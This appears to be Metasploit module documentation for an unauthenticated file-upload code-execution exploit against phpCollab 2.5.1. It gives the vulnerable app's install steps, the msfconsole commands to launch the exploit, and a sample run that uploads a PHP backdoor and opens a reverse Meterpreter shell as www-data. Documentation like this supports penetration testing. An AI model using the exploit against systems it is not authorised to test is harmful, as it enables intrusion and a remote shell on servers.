## Vulnerable Application

This module exploits a file upload vulnerability in phpCollab 2.5.1
which could be abused to allow unauthenticated users to execute arbitrary code
under the context of the web server user.

The exploit has been tested on Ubuntu 16.04.3 64-bit

### Vulnerable Application Installation

You can download the vulnerable application from the [exploit-db page](https://www.exploit-db.com/apps/dda41c5b541d7adc0b50b1fcf3bf7519-phpCollab-v2.5.1.zip).

Follow the install instructions from the phpCollab website:
http://phpcollab.com/documentation/install.htm.

The phpCollab application is only compatible with php5.

## Verification Steps

```
msf > use exploit/unix/webapp/phpcollab_upload_exec
msf exploit(phpcollab_upload_exec) > set RHOST [IP Address] 
msf exploit(phpcollab_upload_exec) > set TARGETURI [Installation Directory] 
msf exploit(phpcollab_upload_exec) > exploit 

## Scenarios

[*] Started reverse TCP handler on 192.168.246.129:4444 
[*] Uploading backdoor file: 1.mEgUkeNnxP.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 192.168.246.144
[*] Meterpreter session 1 opened (192.168.246.129:4444 -> 192.168.246.144:49264) at 2017-12-20 15:44:36 -0500
[+] Deleted 1.mEgUkeNnxP.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www/html/phpcollab/logos_clients
meterpreter >

```


